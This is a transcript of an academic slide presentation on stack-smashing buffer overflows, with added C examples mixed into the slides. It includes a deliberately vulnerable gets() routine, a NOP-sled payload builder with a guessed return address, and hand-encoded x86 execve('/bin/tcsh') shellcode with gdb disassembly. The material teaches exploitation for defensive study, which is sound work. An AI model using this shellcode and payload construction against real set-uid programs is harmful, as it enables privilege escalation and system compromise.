Buffer Overflow Attacks - PowerPoint PPT Presentation

About This Presentation
Title:

Buffer Overflow Attacks

Description:

Buffer Overflow Attacks 'Execution of Arbitrary Code' Aparna Bajaj. Amul Shah ... rwxr-xr-x 1 root root 466944 Mar 11 1994 /usr/local/etc/ftpd. SetUID ... – PowerPoint PPT presentation

Slides: 20
Provided by: amul4

Transcript and Presenter's Notes

1
Buffer Overflow Attacks
  • Execution of Arbitrary Code
  • Aparna Bajaj
  • Amul Shah
  • CS 6265 - Project Presentation
  • September 3rd, 2002

2
Overview
  • Introduction
  • Unix Privileges
  • Telnet
  • Buffer Overflow
  • Binary Attack Code
  • Summary
  • References

3
Introduction
  • Defensive Training
  • How to Test?
  • Knowledge is Power

4
Unix Privileges
  • Authorization
  • File System
    amul@tokyo% ls -ld /net/hc282/amul
    drwx--x--x 31 amul stud 4096 Apr 13 12:40 /net/hc282/amul
  • Permission Inheritance
    amul@tokyo% ls -l /usr/local/etc/ftpd
    -rwxr-xr-x 1 root root 466944 Mar 11 1994 /usr/local/etc/ftpd
  • SetUID
    amul@tokyo% ls -l /usr/lib/fs/ufs/quota
    -r-sr-xr-x 1 root bin 15260 Oct 6 1998 /usr/lib/fs/ufs/quota
  • The "s" in the owner's execute position means the program runs with the
    owner's (here root's) effective uid no matter who invokes it, so any
    memory-corruption bug in it hands the caller root
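The slide reads the set-uid bit off an ls -l line by eye. The following is an added example (not from the presentation) of doing the same check programmatically: it classifies one path with lstat() and lists every set-uid or set-gid regular file in a directory, which is the inventory step a tester does before looking for overflows in privileged programs. The directory walked and the file names are whatever the caller passes; nothing here is taken from the slides.

```c
#define _DEFAULT_SOURCE 1
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Classify one path the way the slide reads an "ls -l" line.
 * Returned bits: 1 = regular file, 2 = set-uid, 4 = set-gid, 8 = owned by root.
 * Returns -1 if the path cannot be examined. lstat() is used so that a symlink
 * is reported as itself rather than as whatever it points at. */
int classify_path(const char *path)
{
    struct stat st;
    int flags = 0;

    if (lstat(path, &st) != 0)
        return -1;
    if (S_ISREG(st.st_mode)) flags |= 1;
    if (st.st_mode & S_ISUID) flags |= 2;
    if (st.st_mode & S_ISGID) flags |= 4;
    if (st.st_uid == 0)      flags |= 8;
    return flags;
}

/* Walk one directory (not recursive) and print every set-uid/set-gid regular
 * file in it. Returns the count, or -1 if the directory cannot be opened. */
int scan_dir_for_setuid(const char *dir)
{
    DIR *d = opendir(dir);
    struct dirent *e;
    int found = 0;

    if (d == NULL)
        return -1;
    while ((e = readdir(d)) != NULL) {
        char path[4096];
        int f;

        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        f = classify_path(path);
        if (f < 0 || !(f & 1) || !(f & (2 | 4)))
            continue;               /* unreadable, not a regular file, or neither bit set */
        printf("%s%s%s %s\n",
               (f & 2) ? "setuid " : "",
               (f & 4) ? "setgid " : "",
               (f & 8) ? "root-owned" : "non-root",
               path);
        found++;
    }
    closedir(d);
    return found;
}

int main(int argc, char **argv)
{
    const char *dir = argc > 1 ? argv[1] : "/usr/bin";   /* default is an assumption */
    int n = scan_dir_for_setuid(dir);

    printf("%d set-uid/set-gid files in %s\n", n, dir);
    return n < 0;
}
```

Run it against the directories that hold network daemons and set-uid helpers (the slide's /usr/local/etc and /usr/lib/fs/ufs); a root-owned hit that also accepts untrusted input is exactly the "privileges plus point of access" combination the summary slide describes.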

5
Telnet
  • Purpose (as RFC 854 states it)
  • provide a fairly general bi-directional
    eight-bit byte oriented communications facility.
  • allow a standard method of interfacing terminal
    devices and terminal-oriented processes to each
    other.
  • may also be used for terminal-terminal
    communication ("linking") and process-process
    communication distributed computation.

6
Telnet
  • The Threat: every listening service is a point of access, and its greeting
    banner tells the attacker which program, and which version, will parse the
    input
    amul@tokyo% telnet tokyo.cc.gatech.edu smtp
    Trying 130.207.114.15...
    Connected to tokyo.cc.gatech.edu.
    Escape character is '^]'.
    220 tokyo.cc.gatech.edu ESMTP Sendmail 8.10.2+Sun/8.9.1; Sun, 14 Apr 2002 19:11:20 -0400 (EDT)
    amul@tokyo% telnet tokyo.cc.gatech.edu ftp
    Trying 130.207.114.15...
    Connected to tokyo.cc.gatech.edu.
    Escape character is '^]'.
    220 tokyo FTP server (SunOS 5.7) ready.

7
Buffer Overflow
  • Process Address Space
  • Stack Overflow
  • Overwriting Memory Structures
  • Address Redirection

8
Process Address Space
  (diagram: segments from low to high address: Text, Data, BSS, Heap, Stack,
  then unallocated memory)
  • Text - program instructions
  • Data - initialized variables
    char name[] = "amul";
  • BSS - static uninitialized variables
    static char name[128];
  • Heap - dynamically allocated variable data
    char *name;
    name = (char *) malloc(128 * sizeof(char));
  • Stack - local variables
    char name[128];
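To make the map on this slide concrete, here is an added example (not part of the presentation) that takes one address from each of the five regions using the slide's own declarations and checks that they really sit in the order text < data < bss < heap < stack. The variable names are the slide's; the check and the printout are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* One object per storage class named on the slide. */
char data_name[] = "amul";      /* Data: initialized global, stored in the image   */
static char bss_name[128];      /* BSS: zero-filled at load time, no file space    */

/* Text: the code of this function itself lives in the text segment. */
uintptr_t text_address(void)
{
    return (uintptr_t)&text_address;
}

/* Take one address from each segment and report whether they follow the slide's
 * low-to-high order. Returns 1 if they do, 0 if not or if malloc fails. The
 * addresses are printed so the map can be read off a real process. */
int segments_in_slide_order(void)
{
    char stack_name[128];                          /* Stack: local array        */
    char *heap_name = malloc(128 * sizeof(char));  /* Heap: dynamic allocation  */
    uintptr_t text, data, bss, heap, stack;
    int ok;

    if (heap_name == NULL)
        return 0;
    text  = text_address();
    data  = (uintptr_t)data_name;
    bss   = (uintptr_t)bss_name;
    heap  = (uintptr_t)heap_name;
    stack = (uintptr_t)stack_name;
    printf("text  %p\ndata  %p\nbss   %p\nheap  %p\nstack %p\n",
           (void *)text, (void *)data, (void *)bss, (void *)heap, (void *)stack);
    ok = text < data && data < bss && bss < heap && heap < stack;
    free(heap_name);
    return ok;
}

/* The direction that matters for stack smashing: the stack grows toward lower
 * addresses, but an array on it is indexed toward higher addresses, i.e. toward
 * the saved frame pointer and return address above it. Returns 1 if so. */
int array_grows_toward_frame(void)
{
    char buf[16];
    char marker;                       /* declared after buf, so in an older frame slot */
    (void)marker;
    return (uintptr_t)&buf[15] > (uintptr_t)&buf[0];
}

int main(void)
{
    printf("segments in slide order: %s\n", segments_in_slide_order() ? "yes" : "no");
    printf("array indexes toward frame: %s\n", array_grows_toward_frame() ? "yes" : "no");
    return 0;
}
```

Run it twice on a system with address-space randomization and the heap and stack numbers move between runs while the order does not; that is the property the later "Redirection" slide relies on and that randomization was introduced to break.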

9
Stack Overflow
  (diagram: the frame of checkpasswd() from low to high address: password[128],
  userpassword[128], saved bp, return address, then the arguments uid and
  somePtr, with the command-line arguments and environment variables above
  them; the stack pointer marks the low end and the base pointer the saved
  bp/return boundary)
  int checkpasswd(int uid, void *somePtr)
  {
      char password[128], userpassword[128];
      /* load password from password file into userpassword */
      gets(password);
      return (strcmp(password, userpassword) == 0);
  }
  • gets() takes no length: input longer than 127 bytes runs off the end of
    password[] into the neighbouring buffer, the saved bp and the return address
10
Overwriting Memory
  • Data Overwriting
  • Address Overwriting
  • Buffer Pointers
  • Activation Records
  • Long Jump Buffers
  • Function Pointers

11
Redirection
  (diagram: the address-space map of slide 8, Text through Stack, with the
  overwritten return address pointing back into the stack)
  • Guess work!
  • All programs have the same starting stack pointer (true of the systems in
    this talk; stack-address randomization on current systems removes this fixed
    reference, which is why the guess has to be made again for each target)
  • Offset starting SP
  • Addresses are attack specific
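Slides 9 through 11 describe the mechanism in words; the following added example (mine, not the presenters') plays it out deterministically. It models the checkpasswd() frame as a struct laid out the way the diagram draws it, performs the unbounded copy the slide's gets() performs, and builds the classic payload: a NOP sled, the shellcode, then the guessed return address repeated in 4-byte slots that end exactly on the return slot, so the overwrite still lands in the sled when the guess is off by a few words. The shellcode is a two-byte stand-in, the 0xbffffa30 guess is hypothetical, and the frame is a model, not what any compiler actually emits.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the slide-9 frame, low to high address. */
struct frame {
    char password[128];      /* gets() writes here with no bound       */
    char userpassword[128];
    uint32_t saved_bp;       /* caller's base pointer                  */
    uint32_t ret;            /* return address: the redirection target */
    uint32_t uid;            /* first argument, above the return slot  */
};

/* The slide's bug: a copy that starts at password[] and does not stop at its end.
 * Writing through a byte pointer to the whole frame keeps this defined C while
 * reproducing what gets() does to the real frame. */
void vulnerable_copy(struct frame *f, const unsigned char *input, size_t len)
{
    if (len > sizeof *f)
        len = sizeof *f;                 /* stay inside the modelled frame */
    memcpy((unsigned char *)f, input, len);
}

/* The fix: bound the copy by the destination, as fgets(buf, sizeof buf, stdin) does. */
void bounded_copy(struct frame *f, const unsigned char *input, size_t len)
{
    if (len > sizeof f->password - 1)
        len = sizeof f->password - 1;
    memcpy(f->password, input, len);
    f->password[len] = '\0';
}

/* Build the payload. distance_to_ret is the offset from the buffer start to the
 * return slot. Layout: NOP sled, shellcode, alignment pad, then 'guess' repeated
 * in slots that end on the return slot. Returns the payload length, or 0 if the
 * shellcode does not fit in front of the return slot or the payload is too long. */
size_t build_payload(unsigned char *out, size_t out_len, size_t distance_to_ret,
                     const unsigned char *shellcode, size_t sc_len, uint32_t guess)
{
    size_t total = distance_to_ret + sizeof guess;   /* must cover the return slot */
    size_t sled, fill_start, i;

    if (total > out_len || sc_len > distance_to_ret)
        return 0;
    sled = (distance_to_ret - sc_len) / 2;            /* half sled, half addresses */
    fill_start = total - ((total - sled - sc_len) / sizeof guess) * sizeof guess;
    memset(out, 0x90, sled);                          /* 0x90 = x86 nop            */
    memcpy(out + sled, shellcode, sc_len);
    memset(out + sled + sc_len, 0x90, fill_start - sled - sc_len);  /* alignment pad */
    for (i = fill_start; i < total; i += sizeof guess)
        memcpy(out + i, &guess, sizeof guess);        /* host byte order, same as the target CPU's */
    return total;
}

#define LEGIT_RET   0x08000153u   /* return into main after the call, from slide 13 */
#define GUESSED_RET 0xbffffa30u   /* hypothetical guess at where the sled lands     */

/* Stand-in for shellcode: a lone int $0x80 (constructed, not a working exploit). */
static const unsigned char stub_shellcode[] = { 0xcd, 0x80 };

/* Run the payload through the unbounded copy and report what now sits in 'ret'. */
uint32_t smashed_return_address(void)
{
    struct frame f;
    unsigned char payload[sizeof f];
    size_t n;

    memset(&f, 0, sizeof f);
    f.ret = LEGIT_RET;
    n = build_payload(payload, sizeof payload, offsetof(struct frame, ret),
                      stub_shellcode, sizeof stub_shellcode, GUESSED_RET);
    vulnerable_copy(&f, payload, n);
    return f.ret;
}

/* Same payload through the bounded copy: the return address survives. */
uint32_t intact_return_address(void)
{
    struct frame f;
    unsigned char payload[sizeof f];
    size_t n;

    memset(&f, 0, sizeof f);
    f.ret = LEGIT_RET;
    n = build_payload(payload, sizeof payload, offsetof(struct frame, ret),
                      stub_shellcode, sizeof stub_shellcode, GUESSED_RET);
    bounded_copy(&f, payload, n);
    return f.ret;
}

int main(void)
{
    printf("vulnerable copy: ret = %#x\n", smashed_return_address());
    printf("bounded copy:    ret = %#x\n", intact_return_address());
    return 0;
}
```

The repeated-address tail is what the slide calls "Offset starting SP" in practice: the attacker does not need the exact distance to the return slot, only a guess that is within the sled, and the repetition covers the uncertainty about where the slot is.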

12
Binary Attack Code
  /* project_shellcode.c
   * Amul Shah (amul@cc.gatech.edu)
   * 03.25.2002
   * This is a pseudo copy of aleph1's [1] attack shellcode.
   * How To Compile (use with gdb):
   *   gcc -ggdb -static project_shellcode.c -o shellcode
   */
  #include <stdio.h>
  #include <stdlib.h>    /* exit()   */
  #include <unistd.h>    /* execve() */

  int main()
  {
      char *name[2];
      name[0] = "/bin/tcsh";
      name[1] = 0;
      execve(name[0], name, 0);
      exit(0);
  }

13
Binary Attack Code
  (gdb) disassemble main
  Dump of assembler code for function main:
  0x8000130 <main>:     pushl %ebp                         # save the old base pointer
  0x8000131 <main+1>:   movl  %esp,%ebp                    # make the bp point to the sp
  0x8000133 <main+3>:   subl  $0x8,%esp                    # allocate 8 bytes of space for the 2
                                                           # pointers; subtract from sp because the
                                                           # stack grows to lower addresses
  0x8000136 <main+6>:   movl  $0x80027b8,0xfffffff8(%ebp)  # copy the address of the string
                                                           # into name[0]
  0x800013d <main+13>:  movl  $0x0,0xfffffffc(%ebp)        # copy null into name[1]
  0x8000144 <main+20>:  pushl $0x0                         # push arg 3 to execve onto the stack
  0x8000146 <main+22>:  leal  0xfffffff8(%ebp),%eax
  0x8000149 <main+25>:  pushl %eax                         # push arg 2 to execve onto the stack
  0x800014a <main+26>:  movl  0xfffffff8(%ebp),%eax
  0x800014d <main+29>:  pushl %eax                         # push arg 1 to execve onto the stack
  0x800014e <main+30>:  call  0x80002bc <__execve>         # do execve(arg1,arg2,arg3)
  0x8000153 <main+35>:  addl  $0xc,%esp
  0x8000156 <main+38>:  movl  %ebp,%esp
  0x8000158 <main+40>:  popl  %ebp

14
Binary Attack Code
  (gdb) disassemble __execve
  Dump of assembler code for function __execve:
  (standard stack operations cut for brevity)
  0x80002c0 <__execve+4>:   movl  $0xb,%eax          # syscall table index for execve
  0x80002c5 <__execve+9>:   movl  0x8(%ebp),%ebx     # copy string address to register
  0x80002c8 <__execve+12>:  movl  0xc(%ebp),%ecx     # copy name to register
  0x80002cb <__execve+15>:  movl  0x10(%ebp),%edx    # copy NULL to register
  0x80002ce <__execve+18>:  int   $0x80              # send interrupt into kernel
  0x80002d0 <__execve+20>:  movl  %eax,%edx
  0x80002d2 <__execve+22>:  testl %edx,%edx
  0x80002d4 <__execve+24>:  jnl   0x80002e6 <__execve+42>
  0x80002d6 <__execve+26>:  negl  %edx
  0x80002d8 <__execve+28>:  pushl %edx
  0x80002d9 <__execve+29>:  call  0x8001a34 <__normal_errno_location>
  0x80002de <__execve+34>:  popl  %edx
  0x80002df <__execve+35>:  movl  %edx,(%eax)
  0x80002e1 <__execve+37>:  movl  $0xffffffff,%eax
  0x80002e6 <__execve+42>:  popl  %ebx
  0x80002e7 <__execve+43>:  movl  %ebp,%esp

15
Binary Attack Code
  (gdb) disassemble _exit
  Dump of assembler code for function _exit:
  0x800034c <_exit>:     pushl %ebp
  0x800034d <_exit+1>:   movl  %esp,%ebp
  0x800034f <_exit+3>:   pushl %ebx
  0x8000350 <_exit+4>:   movl  $0x1,%eax             # copy syscall table index for exit
  0x8000355 <_exit+9>:   movl  0x8(%ebp),%ebx        # copy 0 into ebx; we used exit(0)
  0x8000358 <_exit+12>:  int   $0x80                 # send interrupt into kernel
  0x800035a <_exit+14>:  movl  0xfffffffc(%ebp),%ebx
  0x800035d <_exit+17>:  movl  %ebp,%esp
  0x800035f <_exit+19>:  popl  %ebp
  0x8000360 <_exit+20>:  ret
  0x8000361 <_exit+21>:  nop
  0x8000362 <_exit+22>:  nop
  0x8000363 <_exit+23>:  nop
  End of assembler dump.

16
Binary Attack Code
  • Have the string /bin/tcsh in memory
  • Place a null in memory after the string
  • Copy 0xb into eax (the execve entry in the syscall table)
  • Copy the address of the string into ebx (arg 1, the path)
  • Copy the address of the pointer to the string into ecx (arg 2, the argv
    array)
  • Copy NULL into edx (arg 3, envp)
  • Send interrupt 0x80 instruction
  • Copy 0x1 into eax (the exit syscall)
  • Copy 0x0 into ebx (the exit status)
  • Send interrupt 0x80 instruction
    movl  str_addr,str_addr_addr
    movb  $0x0,null_byte_addr
    movl  $0x0,null_addr
    movl  $0xb,%eax
    movl  str_addr,%ebx
    leal  str_addr_addr,%ecx
    leal  null_string,%edx
    int   $0x80
    movl  $0x1,%eax
    movl  $0x0,%ebx
    int   $0x80
    .string "/bin/tcsh"

17
Binary Attack Code
  jmp   0x2a                  # 2 bytes: forward to the call
  popl  %esi                  # 1 byte: esi = address of the string
  movl  %esi,0xc(%esi)        # 3 bytes: argv[0] = address of the string
  movb  $0x0,0x9(%esi)        # 4 bytes: null-terminate "/bin/tcsh"
  movl  $0x0,0x10(%esi)       # 7 bytes: argv[1] = NULL
  movl  $0xb,%eax             # 5 bytes: execve
  movl  %esi,%ebx             # 2 bytes: arg 1 = path
  leal  0xc(%esi),%ecx        # 3 bytes: arg 2 = argv
  leal  0x10(%esi),%edx       # 3 bytes: arg 3 = envp (NULL)
  int   $0x80                 # 2 bytes
  movl  $0x1,%eax             # 5 bytes: exit
  movl  $0x0,%ebx             # 5 bytes: status 0
  int   $0x80                 # 2 bytes
  call  -0x2f                 # 5 bytes: back to popl; the call pushes the string's address
  .string "/bin/tcsh"         # 10 bytes including the terminator .string appends
  • Note: the displacements 0x7/0x8/0xc, the "8 bytes" string size, "jmp 0x2z
    (3 bytes)" and "call -0x2b" on the original slide were carried over from
    Aleph One's /bin/sh listing [1]. With the 9-character /bin/tcsh the null
    belongs at 0x9, argv[0] at 0xc and the NULL at 0x10; a short jmp is 2
    bytes; and the displacements that actually encode are 0x2a (eb 2a) and
    -0x2f (e8 d1 ff ff ff)
  (diagram: the bytes are placed in the array starting at position 0 at the
  low address, and execution reads them upward toward the high address)
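Before a sequence like the one on slides 16 and 17 is dropped into a buffer it is worth checking it the way an assembler would. The following added example (my code, not the presenters') hand-encodes the /bin/tcsh version of the listing, resolves the jmp and call displacements to confirm they land on the call and on popl, computes the null/argv/NULL offsets for any path (reproducing the slide's 0x7/0x8/0xc for /bin/sh), and counts the NUL bytes in the code part, since any NUL ends a strcpy()-delivered payload early. The byte encoding is mine; the page lists only mnemonics.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Slide 17's instruction sequence encoded for "/bin/tcsh": null at 0x9, argv[0]
 * at 0xc, NULL at 0x10. The string's own terminator is omitted because the movb
 * writes it at run time. */
static const unsigned char shellcode[] = {
    0xeb, 0x2a,                               /* jmp  +0x2a  -> the call     */
    0x5e,                                     /* popl %esi   (esi = string)  */
    0x89, 0x76, 0x0c,                         /* movl %esi,0xc(%esi)         */
    0xc6, 0x46, 0x09, 0x00,                   /* movb $0x0,0x9(%esi)         */
    0xc7, 0x46, 0x10, 0x00, 0x00, 0x00, 0x00, /* movl $0x0,0x10(%esi)        */
    0xb8, 0x0b, 0x00, 0x00, 0x00,             /* movl $0xb,%eax  (execve)    */
    0x89, 0xf3,                               /* movl %esi,%ebx              */
    0x8d, 0x4e, 0x0c,                         /* leal 0xc(%esi),%ecx         */
    0x8d, 0x56, 0x10,                         /* leal 0x10(%esi),%edx        */
    0xcd, 0x80,                               /* int  $0x80                  */
    0xb8, 0x01, 0x00, 0x00, 0x00,             /* movl $0x1,%eax  (exit)      */
    0xbb, 0x00, 0x00, 0x00, 0x00,             /* movl $0x0,%ebx              */
    0xcd, 0x80,                               /* int  $0x80                  */
    0xe8, 0xd1, 0xff, 0xff, 0xff,             /* call -0x2f  -> popl         */
    '/', 'b', 'i', 'n', '/', 't', 'c', 's', 'h'
};
#define POPL_AT 2      /* index of popl %esi            */
#define CALL_AT 44     /* index of the call instruction */
#define STRING_AT 49   /* first byte of the path        */

size_t shellcode_len(void) { return sizeof shellcode; }

/* x86 short jump at 'at': target = address of next instruction + signed rel8. */
long jmp_rel8_target(const unsigned char *code, size_t at)
{
    return (long)(at + 2) + (signed char)code[at + 1];
}

/* x86 near call at 'at': target = next instruction + signed little-endian rel32. */
long call_rel32_target(const unsigned char *code, size_t at)
{
    uint32_t rel = code[at + 1] | code[at + 2] << 8 | code[at + 3] << 16
                 | (uint32_t)code[at + 4] << 24;
    return (long)(at + 5) + (int32_t)rel;
}

/* NUL bytes in the first 'len' bytes: each one truncates a string-copied payload. */
int count_nul_bytes(const unsigned char *code, size_t len)
{
    int n = 0;
    size_t i;
    for (i = 0; i < len; i++)
        if (code[i] == 0)
            n++;
    return n;
}

/* Offsets from %esi that the slide hard-codes for a particular path: the null
 * right after the path, the argv[0] slot at the next 4-byte boundary, and the
 * NULL slot after that. */
void plan_offsets(const char *path, int *nul_off, int *argv_off, int *null_off)
{
    int n = (int)strlen(path);
    *nul_off = n;
    *argv_off = (n + 1 + 3) & ~3;
    *null_off = *argv_off + 4;
}

/* jmp lands on the call, the call lands on popl, and the path follows the call. */
int shellcode_is_consistent(void)
{
    return shellcode[CALL_AT] == 0xe8
        && shellcode[POPL_AT] == 0x5e
        && jmp_rel8_target(shellcode, 0) == CALL_AT
        && call_rel32_target(shellcode, CALL_AT) == POPL_AT
        && memcmp(shellcode + STRING_AT, "/bin/tcsh", 9) == 0;
}

int main(void)
{
    int a, b, c;
    printf("%zu bytes, consistent: %s, NUL bytes in code: %d\n", shellcode_len(),
           shellcode_is_consistent() ? "yes" : "no",
           count_nul_bytes(shellcode, STRING_AT));
    plan_offsets("/bin/tcsh", &a, &b, &c);
    printf("/bin/tcsh: null at %#x, argv[0] at %#x, NULL at %#x\n", a, b, c);
    return 0;
}
```

The NUL count is the practical problem with this first version of the listing: the 32-bit immediates in movl $0x0 and movl $0xb/$0x1 embed fifteen zero bytes, which is why Aleph One's article goes on to rewrite them with xor and byte-sized moves before the code is usable inside a string.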
18
Summary
  • What makes an application a good target
  • Privileges
  • Point of Access
  • How to initiate a buffer overflow to do something
    meaningful
  • Stack Smashing Attack
  • How to create binary attack code

19
References
  • Web sites
  • Phrack e-Zine, http://www.phrack.org
  • BugTraq archives hosted at http://www.geek-girl.com/bugtraq/
  • nsfsecurity.pr.erau.edu
  • Canonical resources
  • [1] Aleph One. Smashing The Stack For Fun And Profit. Phrack, Volume 7,
    Issue 49, File 14, November 1996.
  • [2] Matt Conover and w00w00 Security Team. w00w00 on Heap Overflows.
    http://www.w00w00.org/articles.html, January 1999.